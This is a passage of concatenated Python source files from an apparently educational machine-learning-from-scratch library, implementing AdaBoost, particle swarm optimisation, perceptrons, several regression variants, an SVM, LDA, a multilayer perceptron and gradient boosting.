found individual which matches the target => Done if fittest_individual == self.target: break # Set the probability that the individual should be selected as a parent # proportionate to the individual's fitness. parent_probabilities = [fitness / sum(population_fitness) for fitness in population_fitness] # Determine the next generation new_population = [] for i in np.arange(0, self.population_size, 2): # Select two parents randomly according to probabilities parent1, parent2 = np.random.choice(self.population, size=2, p=parent_probabilities, replace=False) # Perform crossover to produce offspring child1, child2 = self._crossover(parent1, parent2) # Save mutated offspring for next generation new_population += [self._mutate(child1), self._mutate(child2)] print ("[%d Closest Candidate: '%s', Fitness: %.2f]" % (epoch, fittest_individual, highest_fitness)) self.population = new_population print ("[%d Answer: '%s']" % (epoch, fittest_individual)) File: mlfromscratch/supervised_learning/adaboost.py from __future__ import division, print_function import numpy as np import math from sklearn import datasets import matplotlib.pyplot as plt import pandas as pd # Import helper functions from mlfromscratch.utils import train_test_split, accuracy_score, Plot # Decision stump used as weak classifier in this impl. of Adaboost class DecisionStump(): def __init__(self): # Determines if sample shall be classified as -1 or 1 given threshold self.polarity = 1 # The index of the feature used to make classification self.feature_index = None # The threshold value that the feature should be measured against self.threshold = None # Value indicative of the classifier's accuracy self.alpha = None class Adaboost(): """Boosting method that uses a number of weak classifiers in ensemble to make a strong classifier. This implementation uses decision stumps, which is a one level Decision Tree. Parameters: ----------- n_clf: int The number of weak classifiers that will be used. 
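    Example (an illustrative sketch; X_train, y_train and X_test are assumed,
    with labels encoded as -1 and 1 as in main() below):

        clf = Adaboost(n_clf=5)
        clf.fit(X_train, y_train)
        y_pred = clf.predict(X_test)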
""" def __init__(self, n_clf=5): self.n_clf = n_clf def fit(self, X, y): n_samples, n_features = np.shape(X) # Initialize weights to 1/N w = np.full(n_samples, (1 / n_samples)) self.clfs = [] # Iterate through classifiers for _ in range(self.n_clf): clf = DecisionStump() # Minimum error given for using a certain feature value threshold # for predicting sample label min_error = float('inf') # Iterate throught every unique feature value and see what value # makes the best threshold for predicting y for feature_i in range(n_features): feature_values = np.expand_dims(X[:, feature_i], axis=1) unique_values = np.unique(feature_values) # Try every unique feature value as threshold for threshold in unique_values: p = 1 # Set all predictions to '1' initially prediction = np.ones(np.shape(y)) # Label the samples whose values are below threshold as '-1' prediction[X[:, feature_i] < threshold] = -1 # Error = sum of weights of misclassified samples error = sum(w[y != prediction]) # If the error is over 50% we flip the polarity so that samples that # were classified as 0 are classified as 1, and vice versa # E.g error = 0.8 => (1 - error) = 0.2 if error > 0.5: error = 1 - error p = -1 # If this threshold resulted in the smallest error we save the # configuration if error < min_error: clf.polarity = p clf.threshold = threshold clf.feature_index = feature_i min_error = error # Calculate the alpha which is used to update the sample weights, # Alpha is also an approximation of this classifier's proficiency clf.alpha = 0.5 * math.log((1.0 - min_error) / (min_error + 1e-10)) # Set all predictions to '1' initially predictions = np.ones(np.shape(y)) # The indexes where the sample values are below threshold negative_idx = (clf.polarity * X[:, clf.feature_index] < clf.polarity * clf.threshold) # Label those as '-1' predictions[negative_idx] = -1 # Calculate new weights # Missclassified samples gets larger weights and correctly classified samples smaller w *= np.exp(-clf.alpha * y * predictions) # Normalize to one w /= np.sum(w) # Save classifier self.clfs.append(clf) def predict(self, X): n_samples = np.shape(X)[0] y_pred = np.zeros((n_samples, 1)) # For each classifier => label the samples for clf in self.clfs: # Set all predictions to '1' initially predictions = np.ones(np.shape(y_pred)) # The indexes where the sample values are below threshold negative_idx = (clf.polarity * X[:, clf.feature_index] < clf.polarity * clf.threshold) # Label those as '-1' predictions[negative_idx] = -1 # Add predictions weighted by the classifiers alpha # (alpha indicative of classifier's proficiency) y_pred += clf.alpha * predictions # Return sign of prediction sum y_pred = np.sign(y_pred).flatten() return y_pred def main(): data = datasets.load_digits() X = data.data y = data.target digit1 = 1 digit2 = 8 idx = np.append(np.where(y == digit1)[0], np.where(y == digit2)[0]) y = data.target[idx] # Change labels to {-1, 1} y[y == digit1] = -1 y[y == digit2] = 1 X = data.data[idx] X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.5) # Adaboost classification with 5 weak classifiers clf = Adaboost(n_clf=5) clf.fit(X_train, y_train) y_pred = clf.predict(X_test) accuracy = accuracy_score(y_test, y_pred) print ("Accuracy:", accuracy) # Reduce dimensions to 2d using pca and plot the results Plot().plot_in_2d(X_test, y_pred, title="Adaboost", accuracy=accuracy) if __name__ == "__main__": main() File: mlfromscratch/supervised_learning/particle_swarm_optimization.py from __future__ import print_function, division import 
numpy as np import copy class ParticleSwarmOptimizedNN(): """ Particle Swarm Optimization of Neural Network. Parameters: ----------- n_individuals: int The number of neural networks that are allowed in the population at a time. model_builder: method A method which returns a user specified NeuralNetwork instance. inertia_weight: float [0,1) cognitive_weight: float [0,1) social_weight: float [0,1) max_velocity: float The maximum allowed value for the velocity. Reference: Neural Network Training Using Particle Swarm Optimization https://visualstudiomagazine.com/articles/2013/12/01/neural-network-training-using-particle-swarm-optimization.aspx """ def __init__(self, population_size, model_builder, inertia_weight=0.8, cognitive_weight=2, social_weight=2, max_velocity=20): self.population_size = population_size self.model_builder = model_builder self.best_individual = None # Parameters used to update velocity self.cognitive_w = cognitive_weight self.inertia_w = inertia_weight self.social_w = social_weight self.min_v = -max_velocity self.max_v = max_velocity def _build_model(self, id): """ Returns a new individual """ model = self.model_builder(n_inputs=self.X.shape[1], n_outputs=self.y.shape[1]) model.id = id model.fitness = 0 model.highest_fitness = 0 model.accuracy = 0 # Set intial best as the current initialization model.best_layers = copy.copy(model.layers) # Set initial velocity to zero model.velocity = [] for layer in model.layers: velocity = {"W": 0, "w0": 0} if hasattr(layer, 'W'): velocity = {"W": np.zeros_like(layer.W), "w0": np.zeros_like(layer.w0)} model.velocity.append(velocity) return model def _initialize_population(self): """ Initialization of the neural networks forming the population""" self.population = [] for i in range(self.population_size): model = self._build_model(id=i) self.population.append(model) def _update_weights(self, individual): """ Calculate the new velocity and update weights for each layer """ # Two random parameters used to update the velocity r1 = np.random.uniform() r2 = np.random.uniform() for i, layer in enumerate(individual.layers): if hasattr(layer, 'W'): # Layer weights velocity first_term_W = self.inertia_w * individual.velocity[i]["W"] second_term_W = self.cognitive_w * r1 * (individual.best_layers[i].W - layer.W) third_term_W = self.social_w * r2 * (self.best_individual.layers[i].W - layer.W) new_velocity = first_term_W + second_term_W + third_term_W individual.velocity[i]["W"] = np.clip(new_velocity, self.min_v, self.max_v) # Bias weight velocity first_term_w0 = self.inertia_w * individual.velocity[i]["w0"] second_term_w0 = self.cognitive_w * r1 * (individual.best_layers[i].w0 - layer.w0) third_term_w0 = self.social_w * r2 * (self.best_individual.layers[i].w0 - layer.w0) new_velocity = first_term_w0 + second_term_w0 + third_term_w0 individual.velocity[i]["w0"] = np.clip(new_velocity, self.min_v, self.max_v) # Update layer weights with velocity individual.layers[i].W += individual.velocity[i]["W"] individual.layers[i].w0 += individual.velocity[i]["w0"] def _calculate_fitness(self, individual): """ Evaluate the individual on the test set to get fitness scores """ loss, acc = individual.test_on_batch(self.X, self.y) individual.fitness = 1 / (loss + 1e-8) individual.accuracy = acc def evolve(self, X, y, n_generations): """ Will evolve the population for n_generations based on dataset X and labels y""" self.X, self.y = X, y self._initialize_population() # The best individual of the population is initialized as population's first ind. 
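        # A sketch of the update applied by _update_weights to every weight
        # matrix W (and bias w0) of every particle, with r1, r2 ~ U(0, 1):
        #   v <- clip(inertia_w * v
        #             + cognitive_w * r1 * (particle_best_W - W)
        #             + social_w    * r2 * (global_best_W   - W), min_v, max_v)
        #   W <- W + v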
self.best_individual = copy.copy(self.population[0]) for epoch in range(n_generations): for individual in self.population: # Calculate new velocity and update the NN weights self._update_weights(individual) # Calculate the fitness of the updated individual self._calculate_fitness(individual) # If the current fitness is higher than the individual's previous highest # => update the individual's best layer setup if individual.fitness > individual.highest_fitness: individual.best_layers = copy.copy(individual.layers) individual.highest_fitness = individual.fitness # If the individual's fitness is higher than the highest recorded fitness for the # whole population => update the best individual if individual.fitness > self.best_individual.fitness: self.best_individual = copy.copy(individual) print ("[%d Best Individual - ID: %d Fitness: %.5f, Accuracy: %.1f%%]" % (epoch, self.best_individual.id, self.best_individual.fitness, 100*float(self.best_individual.accuracy))) return self.best_individual File: mlfromscratch/supervised_learning/perceptron.py from __future__ import print_function, division import math import numpy as np # Import helper functions from mlfromscratch.utils import train_test_split, to_categorical, normalize, accuracy_score from mlfromscratch.deep_learning.activation_functions import Sigmoid, ReLU, SoftPlus, LeakyReLU, TanH, ELU from mlfromscratch.deep_learning.loss_functions import CrossEntropy, SquareLoss from mlfromscratch.utils import Plot from mlfromscratch.utils.misc import bar_widgets import progressbar class Perceptron(): """The Perceptron. One layer neural network classifier. Parameters: ----------- n_iterations: float The number of training iterations the algorithm will tune the weights for. activation_function: class The activation that shall be used for each neuron. Possible choices: Sigmoid, ExpLU, ReLU, LeakyReLU, SoftPlus, TanH loss: class The loss function used to assess the model's performance. Possible choices: SquareLoss, CrossEntropy learning_rate: float The step length that will be used when updating the weights. 
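    Example (a minimal usage sketch; assumes `X` is a numpy feature array and
    `y` holds integer class labels, one-hot encoded with `to_categorical`
    since `fit` expects a 2D target array):

        >>> clf = Perceptron(n_iterations=5000, learning_rate=0.001)
        >>> clf.fit(X, to_categorical(y))
        >>> y_pred = np.argmax(clf.predict(X), axis=1)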
""" def __init__(self, n_iterations=20000, activation_function=Sigmoid, loss=SquareLoss, learning_rate=0.01): self.n_iterations = n_iterations self.learning_rate = learning_rate self.loss = loss() self.activation_func = activation_function() self.progressbar = progressbar.ProgressBar(widgets=bar_widgets) def fit(self, X, y): n_samples, n_features = np.shape(X) _, n_outputs = np.shape(y) # Initialize weights between [-1/sqrt(N), 1/sqrt(N)] limit = 1 / math.sqrt(n_features) self.W = np.random.uniform(-limit, limit, (n_features, n_outputs)) self.w0 = np.zeros((1, n_outputs)) for i in self.progressbar(range(self.n_iterations)): # Calculate outputs linear_output = X.dot(self.W) + self.w0 y_pred = self.activation_func(linear_output) # Calculate the loss gradient w.r.t the input of the activation function error_gradient = self.loss.gradient(y, y_pred) * self.activation_func.gradient(linear_output) # Calculate the gradient of the loss with respect to each weight grad_wrt_w = X.T.dot(error_gradient) grad_wrt_w0 = np.sum(error_gradient, axis=0, keepdims=True) # Update weights self.W -= self.learning_rate * grad_wrt_w self.w0 -= self.learning_rate * grad_wrt_w0 # Use the trained model to predict labels of X def predict(self, X): y_pred = self.activation_func(X.dot(self.W) + self.w0) return y_pred File: mlfromscratch/supervised_learning/regression.py from __future__ import print_function, division import numpy as np import math from mlfromscratch.utils import normalize, polynomial_features class l1_regularization(): """ Regularization for Lasso Regression """ def __init__(self, alpha): self.alpha = alpha def __call__(self, w): return self.alpha * np.linalg.norm(w) def grad(self, w): return self.alpha * np.sign(w) class l2_regularization(): """ Regularization for Ridge Regression """ def __init__(self, alpha): self.alpha = alpha def __call__(self, w): return self.alpha * 0.5 * w.T.dot(w) def grad(self, w): return self.alpha * w class l1_l2_regularization(): """ Regularization for Elastic Net Regression """ def __init__(self, alpha, l1_ratio=0.5): self.alpha = alpha self.l1_ratio = l1_ratio def __call__(self, w): l1_contr = self.l1_ratio * np.linalg.norm(w) l2_contr = (1 - self.l1_ratio) * 0.5 * w.T.dot(w) return self.alpha * (l1_contr + l2_contr) def grad(self, w): l1_contr = self.l1_ratio * np.sign(w) l2_contr = (1 - self.l1_ratio) * w return self.alpha * (l1_contr + l2_contr) class Regression(object): """ Base regression model. Models the relationship between a scalar dependent variable y and the independent variables X. Parameters: ----------- n_iterations: float The number of training iterations the algorithm will tune the weights for. learning_rate: float The step length that will be used when updating the weights. 
""" def __init__(self, n_iterations, learning_rate): self.n_iterations = n_iterations self.learning_rate = learning_rate def initialize_weights(self, n_features): """ Initialize weights randomly [-1/N, 1/N] """ limit = 1 / math.sqrt(n_features) self.w = np.random.uniform(-limit, limit, (n_features, )) def fit(self, X, y): # Insert constant ones for bias weights X = np.insert(X, 0, 1, axis=1) self.training_errors = [] self.initialize_weights(n_features=X.shape[1]) # Do gradient descent for n_iterations for i in range(self.n_iterations): y_pred = X.dot(self.w) # Calculate l2 loss mse = np.mean(0.5 * (y - y_pred)**2 + self.regularization(self.w)) self.training_errors.append(mse) # Gradient of l2 loss w.r.t w grad_w = -(y - y_pred).dot(X) + self.regularization.grad(self.w) # Update the weights self.w -= self.learning_rate * grad_w def predict(self, X): # Insert constant ones for bias weights X = np.insert(X, 0, 1, axis=1) y_pred = X.dot(self.w) return y_pred class LinearRegression(Regression): """Linear model. Parameters: ----------- n_iterations: float The number of training iterations the algorithm will tune the weights for. learning_rate: float The step length that will be used when updating the weights. gradient_descent: boolean True or false depending if gradient descent should be used when training. If false then we use batch optimization by least squares. """ def __init__(self, n_iterations=100, learning_rate=0.001, gradient_descent=True): self.gradient_descent = gradient_descent # No regularization self.regularization = lambda x: 0 self.regularization.grad = lambda x: 0 super(LinearRegression, self).__init__(n_iterations=n_iterations, learning_rate=learning_rate) def fit(self, X, y): # If not gradient descent => Least squares approximation of w if not self.gradient_descent: # Insert constant ones for bias weights X = np.insert(X, 0, 1, axis=1) # Calculate weights by least squares (using Moore-Penrose pseudoinverse) U, S, V = np.linalg.svd(X.T.dot(X)) S = np.diag(S) X_sq_reg_inv = V.dot(np.linalg.pinv(S)).dot(U.T) self.w = X_sq_reg_inv.dot(X.T).dot(y) else: super(LinearRegression, self).fit(X, y) class LassoRegression(Regression): """Linear regression model with a regularization factor which does both variable selection and regularization. Model that tries to balance the fit of the model with respect to the training data and the complexity of the model. A large regularization factor with decreases the variance of the model and do para. Parameters: ----------- degree: int The degree of the polynomial that the independent variable X will be transformed to. reg_factor: float The factor that will determine the amount of regularization and feature shrinkage. n_iterations: float The number of training iterations the algorithm will tune the weights for. learning_rate: float The step length that will be used when updating the weights. """ def __init__(self, degree, reg_factor, n_iterations=3000, learning_rate=0.01): self.degree = degree self.regularization = l1_regularization(alpha=reg_factor) super(LassoRegression, self).__init__(n_iterations, learning_rate) def fit(self, X, y): X = normalize(polynomial_features(X, degree=self.degree)) super(LassoRegression, self).fit(X, y) def predict(self, X): X = normalize(polynomial_features(X, degree=self.degree)) return super(LassoRegression, self).predict(X) class PolynomialRegression(Regression): """Performs a non-linear transformation of the data before fitting the model and doing predictions which allows for doing non-linear regression. 
Parameters: ----------- degree: int The degree of the polynomial that the independent variable X will be transformed to. n_iterations: float The number of training iterations the algorithm will tune the weights for. learning_rate: float The step length that will be used when updating the weights. """ def __init__(self, degree, n_iterations=3000, learning_rate=0.001): self.degree = degree # No regularization self.regularization = lambda x: 0 self.regularization.grad = lambda x: 0 super(PolynomialRegression, self).__init__(n_iterations=n_iterations, learning_rate=learning_rate) def fit(self, X, y): X = polynomial_features(X, degree=self.degree) super(PolynomialRegression, self).fit(X, y) def predict(self, X): X = polynomial_features(X, degree=self.degree) return super(PolynomialRegression, self).predict(X) class RidgeRegression(Regression): """Also referred to as Tikhonov regularization. Linear regression model with a regularization factor. Model that tries to balance the fit of the model with respect to the training data and the complexity of the model. A large regularization factor with decreases the variance of the model. Parameters: ----------- reg_factor: float The factor that will determine the amount of regularization and feature shrinkage. n_iterations: float The number of training iterations the algorithm will tune the weights for. learning_rate: float The step length that will be used when updating the weights. """ def __init__(self, reg_factor, n_iterations=1000, learning_rate=0.001): self.regularization = l2_regularization(alpha=reg_factor) super(RidgeRegression, self).__init__(n_iterations, learning_rate) class PolynomialRidgeRegression(Regression): """Similar to regular ridge regression except that the data is transformed to allow for polynomial regression. Parameters: ----------- degree: int The degree of the polynomial that the independent variable X will be transformed to. reg_factor: float The factor that will determine the amount of regularization and feature shrinkage. n_iterations: float The number of training iterations the algorithm will tune the weights for. learning_rate: float The step length that will be used when updating the weights. """ def __init__(self, degree, reg_factor, n_iterations=3000, learning_rate=0.01, gradient_descent=True): self.degree = degree self.regularization = l2_regularization(alpha=reg_factor) super(PolynomialRidgeRegression, self).__init__(n_iterations, learning_rate) def fit(self, X, y): X = normalize(polynomial_features(X, degree=self.degree)) super(PolynomialRidgeRegression, self).fit(X, y) def predict(self, X): X = normalize(polynomial_features(X, degree=self.degree)) return super(PolynomialRidgeRegression, self).predict(X) class ElasticNet(Regression): """ Regression where a combination of l1 and l2 regularization are used. The ratio of their contributions are set with the 'l1_ratio' parameter. Parameters: ----------- degree: int The degree of the polynomial that the independent variable X will be transformed to. reg_factor: float The factor that will determine the amount of regularization and feature shrinkage. l1_ration: float Weighs the contribution of l1 and l2 regularization. n_iterations: float The number of training iterations the algorithm will tune the weights for. learning_rate: float The step length that will be used when updating the weights. 
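    Example (a minimal usage sketch; assumes numpy arrays `X` and `y` of
    training inputs and targets):

        >>> model = ElasticNet(degree=2, reg_factor=0.05, l1_ratio=0.5)
        >>> model.fit(X, y)
        >>> y_pred = model.predict(X)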
""" def __init__(self, degree=1, reg_factor=0.05, l1_ratio=0.5, n_iterations=3000, learning_rate=0.01): self.degree = degree self.regularization = l1_l2_regularization(alpha=reg_factor, l1_ratio=l1_ratio) super(ElasticNet, self).__init__(n_iterations, learning_rate) def fit(self, X, y): X = normalize(polynomial_features(X, degree=self.degree)) super(ElasticNet, self).fit(X, y) def predict(self, X): X = normalize(polynomial_features(X, degree=self.degree)) return super(ElasticNet, self).predict(X) File: mlfromscratch/supervised_learning/support_vector_machine.py from __future__ import division, print_function import numpy as np import cvxopt from mlfromscratch.utils import train_test_split, normalize, accuracy_score from mlfromscratch.utils.kernels import * from mlfromscratch.utils import Plot # Hide cvxopt output cvxopt.solvers.options['show_progress'] = False class SupportVectorMachine(object): """The Support Vector Machine classifier. Uses cvxopt to solve the quadratic optimization problem. Parameters: ----------- C: float Penalty term. kernel: function Kernel function. Can be either polynomial, rbf or linear. power: int The degree of the polynomial kernel. Will be ignored by the other kernel functions. gamma: float Used in the rbf kernel function. coef: float Bias term used in the polynomial kernel function. """ def __init__(self, C=1, kernel=rbf_kernel, power=4, gamma=None, coef=4): self.C = C self.kernel = kernel self.power = power self.gamma = gamma self.coef = coef self.lagr_multipliers = None self.support_vectors = None self.support_vector_labels = None self.intercept = None def fit(self, X, y): n_samples, n_features = np.shape(X) # Set gamma to 1/n_features by default if not self.gamma: self.gamma = 1 / n_features # Initialize kernel method with parameters self.kernel = self.kernel( power=self.power, gamma=self.gamma, coef=self.coef) # Calculate kernel matrix kernel_matrix = np.zeros((n_samples, n_samples)) for i in range(n_samples): for j in range(n_samples): kernel_matrix[i, j] = self.kernel(X[i], X[j]) # Define the quadratic optimization problem P = cvxopt.matrix(np.outer(y, y) * kernel_matrix, tc='d') q = cvxopt.matrix(np.ones(n_samples) * -1) A = cvxopt.matrix(y, (1, n_samples), tc='d') b = cvxopt.matrix(0, tc='d') if not self.C: G = cvxopt.matrix(np.identity(n_samples) * -1) h = cvxopt.matrix(np.zeros(n_samples)) else: G_max = np.identity(n_samples) * -1 G_min = np.identity(n_samples) G = cvxopt.matrix(np.vstack((G_max, G_min))) h_max = cvxopt.matrix(np.zeros(n_samples)) h_min = cvxopt.matrix(np.ones(n_samples) * self.C) h = cvxopt.matrix(np.vstack((h_max, h_min))) # Solve the quadratic optimization problem using cvxopt minimization = cvxopt.solvers.qp(P, q, G, h, A, b) # Lagrange multipliers lagr_mult = np.ravel(minimization['x']) # Extract support vectors # Get indexes of non-zero lagr. multipiers idx = lagr_mult > 1e-7 # Get the corresponding lagr. 
multipliers self.lagr_multipliers = lagr_mult[idx] # Get the samples that will act as support vectors self.support_vectors = X[idx] # Get the corresponding labels self.support_vector_labels = y[idx] # Calculate intercept with first support vector self.intercept = self.support_vector_labels[0] for i in range(len(self.lagr_multipliers)): self.intercept -= self.lagr_multipliers[i] * self.support_vector_labels[ i] * self.kernel(self.support_vectors[i], self.support_vectors[0]) def predict(self, X): y_pred = [] # Iterate through list of samples and make predictions for sample in X: prediction = 0 # Determine the label of the sample by the support vectors for i in range(len(self.lagr_multipliers)): prediction += self.lagr_multipliers[i] * self.support_vector_labels[ i] * self.kernel(self.support_vectors[i], sample) prediction += self.intercept y_pred.append(np.sign(prediction)) return np.array(y_pred) File: mlfromscratch/supervised_learning/linear_discriminant_analysis.py from __future__ import print_function, division import numpy as np from mlfromscratch.utils import calculate_covariance_matrix, normalize, standardize class LDA(): """The Linear Discriminant Analysis classifier, also known as Fisher's linear discriminant. Can besides from classification also be used to reduce the dimensionaly of the dataset. """ def __init__(self): self.w = None def transform(self, X, y): self.fit(X, y) # Project data onto vector X_transform = X.dot(self.w) return X_transform def fit(self, X, y): # Separate data by class X1 = X[y == 0] X2 = X[y == 1] # Calculate the covariance matrices of the two datasets cov1 = calculate_covariance_matrix(X1) cov2 = calculate_covariance_matrix(X2) cov_tot = cov1 + cov2 # Calculate the mean of the two datasets mean1 = X1.mean(0) mean2 = X2.mean(0) mean_diff = np.atleast_1d(mean1 - mean2) # Determine the vector which when X is projected onto it best separates the # data by class. w = (mean1 - mean2) / (cov1 + cov2) self.w = np.linalg.pinv(cov_tot).dot(mean_diff) def predict(self, X): y_pred = [] for sample in X: h = sample.dot(self.w) y = 1 * (h < 0) y_pred.append(y) return y_pred File: mlfromscratch/supervised_learning/multi_class_lda.py from __future__ import print_function, division import matplotlib.pyplot as plt import numpy as np from mlfromscratch.utils import calculate_covariance_matrix, normalize, standardize class MultiClassLDA(): """Enables dimensionality reduction for multiple class distributions. It transforms the features space into a space where the between class scatter is maximized and the within class scatter is minimized. Parameters: ----------- solver: str If 'svd' we use the pseudo-inverse to calculate the inverse of matrices when doing the transformation. 
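    Example (a minimal usage sketch; assumes `X` is a numpy feature array and
    `y` holds the class labels):

        >>> lda = MultiClassLDA()
        >>> X_2d = lda.transform(X, y, n_components=2)
        >>> lda.plot_in_2d(X, y, title="LDA")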
""" def __init__(self, solver="svd"): self.solver = solver def _calculate_scatter_matrices(self, X, y): n_features = np.shape(X)[1] labels = np.unique(y) # Within class scatter matrix: # SW = sum{ (X_for_class - mean_of_X_for_class)^2 } # <=> (n_samples_X_for_class - 1) * covar(X_for_class) SW = np.empty((n_features, n_features)) for label in labels: _X = X[y == label] SW += (len(_X) - 1) * calculate_covariance_matrix(_X) # Between class scatter: # SB = sum{ n_samples_for_class * (mean_for_class - total_mean)^2 } total_mean = np.mean(X, axis=0) SB = np.empty((n_features, n_features)) for label in labels: _X = X[y == label] _mean = np.mean(_X, axis=0) SB += len(_X) * (_mean - total_mean).dot((_mean - total_mean).T) return SW, SB def transform(self, X, y, n_components): SW, SB = self._calculate_scatter_matrices(X, y) # Determine SW^-1 * SB by calculating inverse of SW A = np.linalg.inv(SW).dot(SB) # Get eigenvalues and eigenvectors of SW^-1 * SB eigenvalues, eigenvectors = np.linalg.eigh(A) # Sort the eigenvalues and corresponding eigenvectors from largest # to smallest eigenvalue and select the first n_components idx = eigenvalues.argsort()[::-1] eigenvalues = eigenvalues[idx][:n_components] eigenvectors = eigenvectors[:, idx][:, :n_components] # Project the data onto eigenvectors X_transformed = X.dot(eigenvectors) return X_transformed def plot_in_2d(self, X, y, title=None): """ Plot the dataset X and the corresponding labels y in 2D using the LDA transformation.""" X_transformed = self.transform(X, y, n_components=2) x1 = X_transformed[:, 0] x2 = X_transformed[:, 1] plt.scatter(x1, x2, c=y) if title: plt.title(title) plt.show() File: mlfromscratch/supervised_learning/multilayer_perceptron.py from __future__ import print_function, division import numpy as np import math from sklearn import datasets from mlfromscratch.utils import train_test_split, to_categorical, normalize, accuracy_score, Plot from mlfromscratch.deep_learning.activation_functions import Sigmoid, Softmax from mlfromscratch.deep_learning.loss_functions import CrossEntropy class MultilayerPerceptron(): """Multilayer Perceptron classifier. A fully-connected neural network with one hidden layer. Unrolled to display the whole forward and backward pass. Parameters: ----------- n_hidden: int: The number of processing nodes (neurons) in the hidden layer. n_iterations: float The number of training iterations the algorithm will tune the weights for. learning_rate: float The step length that will be used when updating the weights. """ def __init__(self, n_hidden, n_iterations=3000, learning_rate=0.01): self.n_hidden = n_hidden self.n_iterations = n_iterations self.learning_rate = learning_rate self.hidden_activation = Sigmoid() self.output_activation = Softmax() self.loss = CrossEntropy() def _initialize_weights(self, X, y): n_samples, n_features = X.shape _, n_outputs = y.shape # Hidden layer limit = 1 / math.sqrt(n_features) self.W = np.random.uniform(-limit, limit, (n_features, self.n_hidden)) self.w0 = np.zeros((1, self.n_hidden)) # Output layer limit = 1 / math.sqrt(self.n_hidden) self.V = np.random.uniform(-limit, limit, (self.n_hidden, n_outputs)) self.v0 = np.zeros((1, n_outputs)) def fit(self, X, y): self._initialize_weights(X, y) for i in range(self.n_iterations): # .............. # Forward Pass # .............. 
# HIDDEN LAYER hidden_input = X.dot(self.W) + self.w0 hidden_output = self.hidden_activation(hidden_input) # OUTPUT LAYER output_layer_input = hidden_output.dot(self.V) + self.v0 y_pred = self.output_activation(output_layer_input) # ............... # Backward Pass # ............... # OUTPUT LAYER # Grad. w.r.t input of output layer grad_wrt_out_l_input = self.loss.gradient(y, y_pred) * self.output_activation.gradient(output_layer_input) grad_v = hidden_output.T.dot(grad_wrt_out_l_input) grad_v0 = np.sum(grad_wrt_out_l_input, axis=0, keepdims=True) # HIDDEN LAYER # Grad. w.r.t input of hidden layer grad_wrt_hidden_l_input = grad_wrt_out_l_input.dot(self.V.T) * self.hidden_activation.gradient(hidden_input) grad_w = X.T.dot(grad_wrt_hidden_l_input) grad_w0 = np.sum(grad_wrt_hidden_l_input, axis=0, keepdims=True) # Update weights (by gradient descent) # Move against the gradient to minimize loss self.V -= self.learning_rate * grad_v self.v0 -= self.learning_rate * grad_v0 self.W -= self.learning_rate * grad_w self.w0 -= self.learning_rate * grad_w0 # Use the trained model to predict labels of X def predict(self, X): # Forward pass: hidden_input = X.dot(self.W) + self.w0 hidden_output = self.hidden_activation(hidden_input) output_layer_input = hidden_output.dot(self.V) + self.v0 y_pred = self.output_activation(output_layer_input) return y_pred def main(): data = datasets.load_digits() X = normalize(data.data) y = data.target # Convert the nominal y values to binary y = to_categorical(y) X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, seed=1) # MLP clf = MultilayerPerceptron(n_hidden=16, n_iterations=1000, learning_rate=0.01) clf.fit(X_train, y_train) y_pred = np.argmax(clf.predict(X_test), axis=1) y_test = np.argmax(y_test, axis=1) accuracy = accuracy_score(y_test, y_pred) print ("Accuracy:", accuracy) # Reduce dimension to two using PCA and plot the results Plot().plot_in_2d(X_test, y_pred, title="Multilayer Perceptron", accuracy=accuracy, legend_labels=np.unique(y)) if __name__ == "__main__": main() File: mlfromscratch/supervised_learning/gradient_boosting.py from __future__ import division, print_function import numpy as np import progressbar # Import helper functions from mlfromscratch.utils import train_test_split, standardize, to_categorical from mlfromscratch.utils import mean_squared_error, accuracy_score from mlfromscratch.deep_learning.loss_functions import SquareLoss, CrossEntropy from mlfromscratch.supervised_learning.decision_tree import RegressionTree from mlfromscratch.utils.misc import bar_widgets class GradientBoosting(object): """Super class of GradientBoostingClassifier and GradientBoostinRegressor. Uses a collection of regression trees that trains on predicting the gradient of the loss function. Parameters: ----------- n_estimators: int The number of classification trees that are used. learning_rate: float The step length that will be taken when following the negative gradient during training. min_samples_split: int The minimum number of samples needed to make a split when building a tree. min_impurity: float The minimum impurity required to split the tree further. max_depth: int The maximum depth of a tree. regression: boolean True or false depending on if we're doing regression or classification. 
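    Example (a minimal usage sketch using the GradientBoostingClassifier
    subclass defined below; assumes numpy arrays `X_train`, `X_test` and
    integer class labels `y_train`):

        >>> clf = GradientBoostingClassifier(n_estimators=200, learning_rate=0.5)
        >>> clf.fit(X_train, y_train)
        >>> y_pred = clf.predict(X_test)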
""" def __init__(self, n_estimators, learning_rate, min_samples_split, min_impurity, max_depth, regression): self.n_estimators = n_estimators self.learning_rate = learning_rate self.min_samples_split = min_samples_split self.min_impurity = min_impurity self.max_depth = max_depth self.regression = regression self.bar = progressbar.ProgressBar(widgets=bar_widgets) # Square loss for regression # Log loss for classification self.loss = SquareLoss() if not self.regression: self.loss = CrossEntropy() # Initialize regression trees self.trees = [] for _ in range(n_estimators): tree = RegressionTree( min_samples_split=self.min_samples_split, min_impurity=min_impurity, max_depth=self.max_depth) self.trees.append(tree) def fit(self, X, y): y_pred = np.full(np.shape(y), np.mean(y, axis=0)) for i in self.bar(range(self.n_estimators)): gradient = self.loss.gradient(y, y_pred) self.trees[i].fit(X, gradient) update = self.trees[i].predict(X) # Update y prediction y_pred -= np.multiply(self.learning_rate, update) def predict(self, X): y_pred = np.array([]) # Make predictions for tree in self.trees: update = tree.predict(X) update = np.multiply(self.learning_rate, update) y_pred = -update if not y_pred.any() else y_pred - update if not self.regression: # Turn into probability distribution y_pred = np.exp(y_pred) / np.expand_dims(np.sum(np.exp(y_pred), axis=1), axis=1) # Set label to the value that maximizes probability y_pred = np.argmax(y_pred, axis=1) return y_pred class GradientBoostingRegressor(GradientBoosting): def __init__(self, n_estimators=200, learning_rate=0.5, min_samples_split=2, min_var_red=1e-7, max_depth=4, debug=False): super(GradientBoostingRegressor, self).__init__(n_estimators=n_estimators, learning_rate=learning_rate, min_samples_split=min_samples_split, min_impurity=min_var_red, max_depth=max_depth, regression=True) class GradientBoostingClassifier(GradientBoosting): def __init__(self, n_estimators=200, learning_rate=.5, min_samples_split=2, min_info_gain=1e-7, max_depth=2, debug=False): super(GradientBoostingClassifier, self).__init__(n_estimators=n_estimators, learning_rate=learning_rate, min_samples_split=min_samples_split, min_impurity=min_info_gain, max_depth=max_depth, regression=False) def fit(self, X, y): y = to_categorical(y) super(GradientBoostingClassifier, self).fit(X, y) File: mlfromscratch/supervised_learning/__init__.py from .adaboost import Adaboost from .bayesian_regression import BayesianRegression from .decision_tree import RegressionTree, ClassificationTree, XGBoostRegressionTree from .gradient_boosting import GradientBoostingClassifier, GradientBoostingRegressor from .k_nearest_neighbors import KNN from .linear_discriminant_analysis import LDA from .regression import LinearRegression, PolynomialRegression, 